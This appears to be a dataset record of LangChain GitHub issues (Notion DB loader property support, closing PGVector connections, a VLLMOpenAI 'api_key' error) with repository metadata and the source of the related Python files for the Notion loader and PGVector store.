for i in range(0, len(ids), chunk_size): chunk = ids[i : i + chunk_size] self._index.delete(ids=chunk, namespace=namespace, **kwargs) elif filter is not None: self._index.delete(filter=filter, namespace=namespace, **kwargs) else: raise ValueError("Either ids, delete_all, or filter must be provided.") return None
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,356
Issue: Notion DB loader for doesn't supports some properties
### Issue you'd like to raise. notion page properties https://developers.notion.com/reference/page-property-values Current version Notion DB loader for doesn't supports following properties for metadata - `checkbox` - `email` - `number` - `select` ### Suggestion: I would like to make a PR to fix this issue if it's okay.
https://github.com/langchain-ai/langchain/issues/13356
https://github.com/langchain-ai/langchain/pull/13358
c9b9359647f1f1b24f106b93f180509db7932950
3b5e8bacfa6d5b7c223cb93f09c6c21d39542b43
"2023-11-14T17:20:22Z"
python
"2023-11-15T04:31:12Z"
libs/langchain/langchain/document_loaders/notiondb.py
from typing import Any, Dict, List, Optional import requests from langchain.docstore.document import Document from langchain.document_loaders.base import BaseLoader NOTION_BASE_URL = "https://api.notion.com/v1" DATABASE_URL = NOTION_BASE_URL + "/databases/{database_id}/query" PAGE_URL = NOTION_BASE_URL + "/pages/{page_id}" BLOCK_URL = NOTION_BASE_URL + "/blocks/{block_id}/children" class NotionDBLoader(BaseLoader): """Load from `Notion DB`. Reads content from pages within a Notion Database. Args: integration_token (str): Notion integration token. database_id (str): Notion database id. request_timeout_sec (int): Timeout for Notion requests in seconds. Defaults to 10. """ def __init__( self, integration_token: str, database_id: str, request_timeout_sec: Optional[int] = 10, ) -> None: """Initialize with parameters.""" if not integration_token: raise ValueError("integration_token must be provided") if not database_id: raise ValueError("database_id must be provided") self.token = integration_token self.database_id = database_id self.headers = { "Authorization": "Bearer " + self.token, "Content-Type": "application/json", "Notion-Version": "2022-06-28", } self.request_timeout_sec = request_timeout_sec def load(self) -> List[Document]: """Load documents from the Notion database. Returns: List[Document]: List of documents. """ page_summaries = self._retrieve_page_summaries() return list(self.load_page(page_summary) for page_summary in page_summaries) def _retrieve_page_summaries( self, query_dict: Dict[str, Any] = {"page_size": 100} ) -> List[Dict[str, Any]]: """Get all the pages from a Notion database.""" pages: List[Dict[str, Any]] = [] while True: data = self._request( DATABASE_URL.format(database_id=self.database_id), method="POST", query_dict=query_dict, ) pages.extend(data.get("results")) if not data.get("has_more"): break query_dict["start_cursor"] = data.get("next_cursor") return pages def load_page(self, page_summary: Dict[str, Any]) -> Document: """Read a page. Args: page_summary: Page summary from Notion API. """ page_id = page_summary["id"] # load properties as metadata metadata: Dict[str, Any] = {} for prop_name, prop_data in page_summary["properties"].items(): prop_type = prop_data["type"] if prop_type == "rich_text": value = ( prop_data["rich_text"][0]["plain_text"] if prop_data["rich_text"] else None ) elif prop_type == "title": value = ( prop_data["title"][0]["plain_text"] if prop_data["title"] else None ) elif prop_type == "multi_select": value = ( [item["name"] for item in prop_data["multi_select"]] if prop_data["multi_select"] else [] ) elif prop_type == "url": value = prop_data["url"] elif prop_type == "unique_id": value = ( f'{prop_data["unique_id"]["prefix"]}-{prop_data["unique_id"]["number"]}' if prop_data["unique_id"] else None ) elif prop_type == "status": value = prop_data["status"]["name"] if prop_data["status"] else None elif prop_type == "people": value = ( [item["name"] for item in prop_data["people"]] if prop_data["people"] else [] ) elif prop_type == "date": value = prop_data["date"] if prop_data["date"] else None elif prop_type == "last_edited_time": value = ( prop_data["last_edited_time"] if prop_data["last_edited_time"] else None ) elif prop_type == "created_time": value = prop_data["created_time"] if prop_data["created_time"] else None else: value = None metadata[prop_name.lower()] = value metadata["id"] = page_id return Document(page_content=self._load_blocks(page_id), metadata=metadata) def _load_blocks(self, block_id: str, num_tabs: int = 0) -> str: """Read a block and its children.""" result_lines_arr: List[str] = [] cur_block_id: str = block_id while cur_block_id: data = self._request(BLOCK_URL.format(block_id=cur_block_id)) for result in data["results"]: result_obj = result[result["type"]] if "rich_text" not in result_obj: continue cur_result_text_arr: List[str] = [] for rich_text in result_obj["rich_text"]: if "text" in rich_text: cur_result_text_arr.append( "\t" * num_tabs + rich_text["text"]["content"] ) if result["has_children"]: children_text = self._load_blocks( result["id"], num_tabs=num_tabs + 1 ) cur_result_text_arr.append(children_text) result_lines_arr.append("\n".join(cur_result_text_arr)) cur_block_id = data.get("next_cursor") return "\n".join(result_lines_arr) def _request( self, url: str, method: str = "GET", query_dict: Dict[str, Any] = {} ) -> Any: res = requests.request( method, url, headers=self.headers, json=query_dict, timeout=self.request_timeout_sec, ) res.raise_for_status() return res.json()
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
9,696
No way to Close an open connection in PGVector.py
### Feature request Initialization with Database Connection: When an instance of the PGVector class is created, it automatically establish a connection with the PostgreSQL Vector database. Method for Closing Connection: we need to implement a method within the PGVector class that allows you to close the established connection with the PostgreSQL database. `def __del__(self): # Close the session (and thus the connection) when the instance is destroyed. self.session.close()` ### Motivation The problem is, I am unable to close a connection and the pool get overload with multiple connections and hence the service starts throwing error ### Your contribution I guess, may be.
https://github.com/langchain-ai/langchain/issues/9696
https://github.com/langchain-ai/langchain/pull/13232
85a77d2c2795b8f0463d809e459c68d4277bd080
1726d5dcdd495fa204c2907ce826df81527e0f14
"2023-08-24T11:57:09Z"
python
"2023-11-15T20:34:37Z"
libs/langchain/langchain/vectorstores/pgvector.py
from __future__ import annotations import asyncio import contextlib import enum import logging import uuid from functools import partial from typing import ( TYPE_CHECKING, Any, Callable, Dict, Generator, Iterable, List, Optional, Tuple, Type, ) import numpy as np import sqlalchemy from sqlalchemy import delete from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.orm import Session try: from sqlalchemy.orm import declarative_base except ImportError: from sqlalchemy.ext.declarative import declarative_base from langchain.docstore.document import Document from langchain.schema.embeddings import Embeddings from langchain.schema.vectorstore import VectorStore from langchain.utils import get_from_dict_or_env from langchain.vectorstores.utils import maximal_marginal_relevance if TYPE_CHECKING: from langchain.vectorstores._pgvector_data_models import CollectionStore class DistanceStrategy(str, enum.Enum): """Enumerator of the Distance strategies.""" EUCLIDEAN = "l2" COSINE = "cosine" MAX_INNER_PRODUCT = "inner" DEFAULT_DISTANCE_STRATEGY = DistanceStrategy.COSINE Base = declarative_base() # type: Any _LANGCHAIN_DEFAULT_COLLECTION_NAME = "langchain" class BaseModel(Base): """Base model for the SQL stores.""" __abstract__ = True uuid = sqlalchemy.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4) def _results_to_docs(docs_and_scores: Any) -> List[Document]: """Return docs from docs and scores.""" return [doc for doc, _ in docs_and_scores] class PGVector(VectorStore): """`Postgres`/`PGVector` vector store. To use, you should have the ``pgvector`` python package installed. Args: connection_string: Postgres connection string. embedding_function: Any embedding function implementing `langchain.embeddings.base.Embeddings` interface. collection_name: The name of the collection to use. (default: langchain) NOTE: This is not the name of the table, but the name of the collection. The tables will be created when initializing the store (if not exists) So, make sure the user has the right permissions to create tables. distance_strategy: The distance strategy to use. (default: COSINE) pre_delete_collection: If True, will delete the collection if it exists. (default: False). Useful for testing. engine_args: SQLAlchemy's create engine arguments. Example: .. code-block:: python from langchain.vectorstores import PGVector from langchain.embeddings.openai import OpenAIEmbeddings CONNECTION_STRING = "postgresql+psycopg2://hwc@localhost:5432/test3" COLLECTION_NAME = "state_of_the_union_test" embeddings = OpenAIEmbeddings() vectorestore = PGVector.from_documents( embedding=embeddings, documents=docs, collection_name=COLLECTION_NAME, connection_string=CONNECTION_STRING, ) """ def __init__( self, connection_string: str, embedding_function: Embeddings, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, collection_metadata: Optional[dict] = None, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, pre_delete_collection: bool = False, logger: Optional[logging.Logger] = None, relevance_score_fn: Optional[Callable[[float], float]] = None, *, connection: Optional[sqlalchemy.engine.Connection] = None, engine_args: Optional[dict[str, Any]] = None, ) -> None: self.connection_string = connection_string self.embedding_function = embedding_function self.collection_name = collection_name self.collection_metadata = collection_metadata self._distance_strategy = distance_strategy self.pre_delete_collection = pre_delete_collection self.logger = logger or logging.getLogger(__name__) self.override_relevance_score_fn = relevance_score_fn self.engine_args = engine_args or {} # Create a connection if not provided, otherwise use the provided connection self._conn = connection if connection else self.connect() self.__post_init__() def __post_init__( self, ) -> None: """Initialize the store.""" self.create_vector_extension() from langchain.vectorstores._pgvector_data_models import ( CollectionStore, EmbeddingStore, ) self.CollectionStore = CollectionStore self.EmbeddingStore = EmbeddingStore self.create_tables_if_not_exists() self.create_collection() @property def embeddings(self) -> Embeddings: return self.embedding_function def connect(self) -> sqlalchemy.engine.Connection: engine = sqlalchemy.create_engine(self.connection_string, **self.engine_args) conn = engine.connect() return conn def create_vector_extension(self) -> None: try: with Session(self._conn) as session: # The advisor lock fixes issue arising from concurrent # creation of the vector extension. # https://github.com/langchain-ai/langchain/issues/12933 # For more information see: # https://www.postgresql.org/docs/16/explicit-locking.html#ADVISORY-LOCKS statement = sqlalchemy.text( "BEGIN;" "SELECT pg_advisory_xact_lock(1573678846307946496);" "CREATE EXTENSION IF NOT EXISTS vector;" "COMMIT;" ) session.execute(statement) session.commit() except Exception as e: raise Exception(f"Failed to create vector extension: {e}") from e def create_tables_if_not_exists(self) -> None: with self._conn.begin(): Base.metadata.create_all(self._conn) def drop_tables(self) -> None: with self._conn.begin(): Base.metadata.drop_all(self._conn) def create_collection(self) -> None: if self.pre_delete_collection: self.delete_collection() with Session(self._conn) as session: self.CollectionStore.get_or_create( session, self.collection_name, cmetadata=self.collection_metadata ) def delete_collection(self) -> None: self.logger.debug("Trying to delete collection") with Session(self._conn) as session: collection = self.get_collection(session) if not collection: self.logger.warning("Collection not found") return session.delete(collection) session.commit() @contextlib.contextmanager def _make_session(self) -> Generator[Session, None, None]: """Create a context manager for the session, bind to _conn string.""" yield Session(self._conn) def delete( self, ids: Optional[List[str]] = None, **kwargs: Any, ) -> None: """Delete vectors by ids or uuids. Args: ids: List of ids to delete. """ with Session(self._conn) as session: if ids is not None: self.logger.debug( "Trying to delete vectors by ids (represented by the model " "using the custom ids field)" ) stmt = delete(self.EmbeddingStore).where( self.EmbeddingStore.custom_id.in_(ids) ) session.execute(stmt) session.commit() def get_collection(self, session: Session) -> Optional["CollectionStore"]: return self.CollectionStore.get_by_name(session, self.collection_name) @classmethod def __from( cls, texts: List[str], embeddings: List[List[float]], embedding: Embeddings, metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, connection_string: Optional[str] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: if ids is None: ids = [str(uuid.uuid1()) for _ in texts] if not metadatas: metadatas = [{} for _ in texts] if connection_string is None: connection_string = cls.get_connection_string(kwargs) store = cls( connection_string=connection_string, collection_name=collection_name, embedding_function=embedding, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, **kwargs, ) store.add_embeddings( texts=texts, embeddings=embeddings, metadatas=metadatas, ids=ids, **kwargs ) return store def add_embeddings( self, texts: Iterable[str], embeddings: List[List[float]], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, **kwargs: Any, ) -> List[str]: """Add embeddings to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. embeddings: List of list of embedding vectors. metadatas: List of metadatas associated with the texts. kwargs: vectorstore specific parameters """ if ids is None: ids = [str(uuid.uuid1()) for _ in texts] if not metadatas: metadatas = [{} for _ in texts] with Session(self._conn) as session: collection = self.get_collection(session) if not collection: raise ValueError("Collection not found") for text, metadata, embedding, id in zip(texts, metadatas, embeddings, ids): embedding_store = self.EmbeddingStore( embedding=embedding, document=text, cmetadata=metadata, custom_id=id, collection_id=collection.uuid, ) session.add(embedding_store) session.commit() return ids def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, ids: Optional[List[str]] = None, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. kwargs: vectorstore specific parameters Returns: List of ids from adding the texts into the vectorstore. """ embeddings = self.embedding_function.embed_documents(list(texts)) return self.add_embeddings( texts=texts, embeddings=embeddings, metadatas=metadatas, ids=ids, **kwargs ) def similarity_search( self, query: str, k: int = 4, filter: Optional[dict] = None, **kwargs: Any, ) -> List[Document]: """Run similarity search with PGVector with distance. Args: query (str): Query text to search for. k (int): Number of results to return. Defaults to 4. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List of Documents most similar to the query. """ embedding = self.embedding_function.embed_query(text=query) return self.similarity_search_by_vector( embedding=embedding, k=k, filter=filter, ) def similarity_search_with_score( self, query: str, k: int = 4, filter: Optional[dict] = None, ) -> List[Tuple[Document, float]]: """Return docs most similar to query. Args: query: Text to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List of Documents most similar to the query and score for each. """ embedding = self.embedding_function.embed_query(query) docs = self.similarity_search_with_score_by_vector( embedding=embedding, k=k, filter=filter ) return docs @property def distance_strategy(self) -> Any: if self._distance_strategy == DistanceStrategy.EUCLIDEAN: return self.EmbeddingStore.embedding.l2_distance elif self._distance_strategy == DistanceStrategy.COSINE: return self.EmbeddingStore.embedding.cosine_distance elif self._distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT: return self.EmbeddingStore.embedding.max_inner_product else: raise ValueError( f"Got unexpected value for distance: {self._distance_strategy}. " f"Should be one of {', '.join([ds.value for ds in DistanceStrategy])}." ) def similarity_search_with_score_by_vector( self, embedding: List[float], k: int = 4, filter: Optional[dict] = None, ) -> List[Tuple[Document, float]]: results = self.__query_collection(embedding=embedding, k=k, filter=filter) return self._results_to_docs_and_scores(results) def _results_to_docs_and_scores(self, results: Any) -> List[Tuple[Document, float]]: """Return docs and scores from results.""" docs = [ ( Document( page_content=result.EmbeddingStore.document, metadata=result.EmbeddingStore.cmetadata, ), result.distance if self.embedding_function is not None else None, ) for result in results ] return docs def __query_collection( self, embedding: List[float], k: int = 4, filter: Optional[Dict[str, str]] = None, ) -> List[Any]: """Query the collection.""" with Session(self._conn) as session: collection = self.get_collection(session) if not collection: raise ValueError("Collection not found") filter_by = self.EmbeddingStore.collection_id == collection.uuid if filter is not None: filter_clauses = [] for key, value in filter.items(): IN = "in" if isinstance(value, dict) and IN in map(str.lower, value): value_case_insensitive = { k.lower(): v for k, v in value.items() } filter_by_metadata = self.EmbeddingStore.cmetadata[ key ].astext.in_(value_case_insensitive[IN]) filter_clauses.append(filter_by_metadata) else: filter_by_metadata = self.EmbeddingStore.cmetadata[ key ].astext == str(value) filter_clauses.append(filter_by_metadata) filter_by = sqlalchemy.and_(filter_by, *filter_clauses) _type = self.EmbeddingStore results: List[Any] = ( session.query( self.EmbeddingStore, self.distance_strategy(embedding).label("distance"), # type: ignore ) .filter(filter_by) .order_by(sqlalchemy.asc("distance")) .join( self.CollectionStore, self.EmbeddingStore.collection_id == self.CollectionStore.uuid, ) .limit(k) .all() ) return results def similarity_search_by_vector( self, embedding: List[float], k: int = 4, filter: Optional[dict] = None, **kwargs: Any, ) -> List[Document]: """Return docs most similar to embedding vector. Args: embedding: Embedding to look up documents similar to. k: Number of Documents to return. Defaults to 4. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List of Documents most similar to the query vector. """ docs_and_scores = self.similarity_search_with_score_by_vector( embedding=embedding, k=k, filter=filter ) return _results_to_docs(docs_and_scores) @classmethod def from_texts( cls: Type[PGVector], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, ids: Optional[List[str]] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """ Return VectorStore initialized from texts and embeddings. Postgres connection string is required "Either pass it as a parameter or set the PGVECTOR_CONNECTION_STRING environment variable. """ embeddings = embedding.embed_documents(list(texts)) return cls.__from( texts, embeddings, embedding, metadatas=metadatas, ids=ids, collection_name=collection_name, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, **kwargs, ) @classmethod def from_embeddings( cls, text_embeddings: List[Tuple[str, List[float]]], embedding: Embeddings, metadatas: Optional[List[dict]] = None, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, ids: Optional[List[str]] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """Construct PGVector wrapper from raw documents and pre- generated embeddings. Return VectorStore initialized from documents and embeddings. Postgres connection string is required "Either pass it as a parameter or set the PGVECTOR_CONNECTION_STRING environment variable. Example: .. code-block:: python from langchain.vectorstores import PGVector from langchain.embeddings import OpenAIEmbeddings embeddings = OpenAIEmbeddings() text_embeddings = embeddings.embed_documents(texts) text_embedding_pairs = list(zip(texts, text_embeddings)) faiss = PGVector.from_embeddings(text_embedding_pairs, embeddings) """ texts = [t[0] for t in text_embeddings] embeddings = [t[1] for t in text_embeddings] return cls.__from( texts, embeddings, embedding, metadatas=metadatas, ids=ids, collection_name=collection_name, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, **kwargs, ) @classmethod def from_existing_index( cls: Type[PGVector], embedding: Embeddings, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """ Get instance of an existing PGVector store.This method will return the instance of the store without inserting any new embeddings """ connection_string = cls.get_connection_string(kwargs) store = cls( connection_string=connection_string, collection_name=collection_name, embedding_function=embedding, distance_strategy=distance_strategy, pre_delete_collection=pre_delete_collection, ) return store @classmethod def get_connection_string(cls, kwargs: Dict[str, Any]) -> str: connection_string: str = get_from_dict_or_env( data=kwargs, key="connection_string", env_key="PGVECTOR_CONNECTION_STRING", ) if not connection_string: raise ValueError( "Postgres connection string is required" "Either pass it as a parameter" "or set the PGVECTOR_CONNECTION_STRING environment variable." ) return connection_string @classmethod def from_documents( cls: Type[PGVector], documents: List[Document], embedding: Embeddings, collection_name: str = _LANGCHAIN_DEFAULT_COLLECTION_NAME, distance_strategy: DistanceStrategy = DEFAULT_DISTANCE_STRATEGY, ids: Optional[List[str]] = None, pre_delete_collection: bool = False, **kwargs: Any, ) -> PGVector: """ Return VectorStore initialized from documents and embeddings. Postgres connection string is required "Either pass it as a parameter or set the PGVECTOR_CONNECTION_STRING environment variable. """ texts = [d.page_content for d in documents] metadatas = [d.metadata for d in documents] connection_string = cls.get_connection_string(kwargs) kwargs["connection_string"] = connection_string return cls.from_texts( texts=texts, pre_delete_collection=pre_delete_collection, embedding=embedding, distance_strategy=distance_strategy, metadatas=metadatas, ids=ids, collection_name=collection_name, **kwargs, ) @classmethod def connection_string_from_db_params( cls, driver: str, host: str, port: int, database: str, user: str, password: str, ) -> str: """Return connection string from database parameters.""" return f"postgresql+{driver}://{user}:{password}@{host}:{port}/{database}" def _select_relevance_score_fn(self) -> Callable[[float], float]: """ The 'correct' relevance function may differ depending on a few things, including: - the distance / similarity metric used by the VectorStore - the scale of your embeddings (OpenAI's are unit normed. Many others are not!) - embedding dimensionality - etc. """ if self.override_relevance_score_fn is not None: return self.override_relevance_score_fn # Default strategy is to rely on distance strategy provided # in vectorstore constructor if self._distance_strategy == DistanceStrategy.COSINE: return self._cosine_relevance_score_fn elif self._distance_strategy == DistanceStrategy.EUCLIDEAN: return self._euclidean_relevance_score_fn elif self._distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT: return self._max_inner_product_relevance_score_fn else: raise ValueError( "No supported normalization function" f" for distance_strategy of {self._distance_strategy}." "Consider providing relevance_score_fn to PGVector constructor." ) def max_marginal_relevance_search_with_score_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Return docs selected using the maximal marginal relevance with score to embedding vector. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: embedding: Embedding to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Tuple[Document, float]]: List of Documents selected by maximal marginal relevance to the query and score for each. """ results = self.__query_collection(embedding=embedding, k=fetch_k, filter=filter) embedding_list = [result.EmbeddingStore.embedding for result in results] mmr_selected = maximal_marginal_relevance( np.array(embedding, dtype=np.float32), embedding_list, k=k, lambda_mult=lambda_mult, ) candidates = self._results_to_docs_and_scores(results) return [r for i, r in enumerate(candidates) if i in mmr_selected] def max_marginal_relevance_search( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query (str): Text to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Document]: List of Documents selected by maximal marginal relevance. """ embedding = self.embedding_function.embed_query(query) return self.max_marginal_relevance_search_by_vector( embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) def max_marginal_relevance_search_with_score( self, query: str, k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[dict] = None, **kwargs: Any, ) -> List[Tuple[Document, float]]: """Return docs selected using the maximal marginal relevance with score. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: query (str): Text to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Tuple[Document, float]]: List of Documents selected by maximal marginal relevance to the query and score for each. """ embedding = self.embedding_function.embed_query(query) docs = self.max_marginal_relevance_search_with_score_by_vector( embedding=embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) return docs def max_marginal_relevance_search_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance to embedding vector. Maximal marginal relevance optimizes for similarity to query AND diversity among selected documents. Args: embedding (str): Text to look up documents similar to. k (int): Number of Documents to return. Defaults to 4. fetch_k (int): Number of Documents to fetch to pass to MMR algorithm. Defaults to 20. lambda_mult (float): Number between 0 and 1 that determines the degree of diversity among the results with 0 corresponding to maximum diversity and 1 to minimum diversity. Defaults to 0.5. filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None. Returns: List[Document]: List of Documents selected by maximal marginal relevance. """ docs_and_scores = self.max_marginal_relevance_search_with_score_by_vector( embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) return _results_to_docs(docs_and_scores) async def amax_marginal_relevance_search_by_vector( self, embedding: List[float], k: int = 4, fetch_k: int = 20, lambda_mult: float = 0.5, filter: Optional[Dict[str, str]] = None, **kwargs: Any, ) -> List[Document]: """Return docs selected using the maximal marginal relevance.""" # This is a temporary workaround to make the similarity search # asynchronous. The proper solution is to make the similarity search # asynchronous in the vector store implementations. func = partial( self.max_marginal_relevance_search_by_vector, embedding, k=k, fetch_k=fetch_k, lambda_mult=lambda_mult, filter=filter, **kwargs, ) return await asyncio.get_event_loop().run_in_executor(None, func)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,507
VLLMOpenAI -- create() got an unexpected keyword argument 'api_key'
### System Info Python 3.9 langchain 0.0.336 openai 1.3.2 pandas 2.1.3 ### Who can help? @EYU ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction First of all, thank you for this great library ! Concerning the bug, I have a vllm openai server (0.2.1.post1) running locally started with the following command: ``` python -m vllm.entrypoints.openai.api_server --model ./zephyr-7b-beta --served-model-name zephyr-7b-beta ``` On the client side, I have this piece of code, slightly adapted from the documentation (only the model name changes). ```python from langchain.llms import VLLMOpenAI llm = VLLMOpenAI( openai_api_key="EMPTY", openai_api_base="http://localhost:8000/v1", model_name="zephyr-7b-beta", ) print(llm("Rome is")) ``` And I got the following error: ```text --------------------------------------------------------------------------- TypeError Traceback (most recent call last) Cell In[19], line 6 1 llm = VLLMOpenAI( 2 openai_api_key="EMPTY", 3 openai_api_base="http://localhost:8000/v1", 4 model_name="zephyr-7b-beta", 5 ) ----> 6 llm("Rome is") File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:876, in BaseLLM.__call__(self, prompt, stop, callbacks, tags, metadata, **kwargs) 869 if not isinstance(prompt, str): 870 raise ValueError( 871 "Argument `prompt` is expected to be a string. Instead found " 872 f"{type(prompt)}. If you want to run the LLM on multiple prompts, use " 873 "`generate` instead." 874 ) 875 return ( --> 876 self.generate( 877 [prompt], 878 stop=stop, 879 callbacks=callbacks, 880 tags=tags, 881 metadata=metadata, 882 **kwargs, 883 ) 884 .generations[0][0] 885 .text 886 ) File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:656, in BaseLLM.generate(self, prompts, stop, callbacks, tags, metadata, run_name, **kwargs) 641 raise ValueError( 642 "Asked to cache, but no cache found at `langchain.cache`." 643 ) 644 run_managers = [ 645 callback_manager.on_llm_start( 646 dumpd(self), (...) 654 ) 655 ] --> 656 output = self._generate_helper( 657 prompts, stop, run_managers, bool(new_arg_supported), **kwargs 658 ) 659 return output 660 if len(missing_prompts) > 0: File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:544, in BaseLLM._generate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 542 for run_manager in run_managers: 543 run_manager.on_llm_error(e) --> 544 raise e 545 flattened_outputs = output.flatten() 546 for manager, flattened_output in zip(run_managers, flattened_outputs): File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/base.py:531, in BaseLLM._generate_helper(self, prompts, stop, run_managers, new_arg_supported, **kwargs) 521 def _generate_helper( 522 self, 523 prompts: List[str], (...) 527 **kwargs: Any, 528 ) -> LLMResult: 529 try: 530 output = ( --> 531 self._generate( 532 prompts, 533 stop=stop, 534 # TODO: support multiple run managers 535 run_manager=run_managers[0] if run_managers else None, 536 **kwargs, 537 ) 538 if new_arg_supported 539 else self._generate(prompts, stop=stop) 540 ) 541 except BaseException as e: 542 for run_manager in run_managers: File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/openai.py:454, in BaseOpenAI._generate(self, prompts, stop, run_manager, **kwargs) 442 choices.append( 443 { 444 "text": generation.text, (...) 451 } 452 ) 453 else: --> 454 response = completion_with_retry( 455 self, prompt=_prompts, run_manager=run_manager, **params 456 ) 457 if not isinstance(response, dict): 458 # V1 client returns the response in an PyDantic object instead of 459 # dict. For the transition period, we deep convert it to dict. 460 response = response.dict() File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/langchain/llms/openai.py:114, in completion_with_retry(llm, run_manager, **kwargs) 112 """Use tenacity to retry the completion call.""" 113 if is_openai_v1(): --> 114 return llm.client.create(**kwargs) 116 retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) 118 @retry_decorator 119 def _completion_with_retry(**kwargs: Any) -> Any: File ~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/openai/_utils/_utils.py:299, in required_args.<locals>.inner.<locals>.wrapper(*args, **kwargs) 297 msg = f"Missing required argument: {quote(missing[0])}" 298 raise TypeError(msg) --> 299 return func(*args, **kwargs) TypeError: create() got an unexpected keyword argument 'api_key' ``` It seems that if I remove the line 158 from `langchain/llms/vllm.py`, the code is working. ### Expected behavior I expect a completion with no error.
https://github.com/langchain-ai/langchain/issues/13507
https://github.com/langchain-ai/langchain/pull/13517
6bc08266e0c9ca7841bb322259e69a9c0dd6a08d
69d39e2173fcb44cdcd334cb912acaf7b148dff6
"2023-11-17T08:56:07Z"
python
"2023-11-20T01:49:55Z"
libs/langchain/langchain/llms/vllm.py
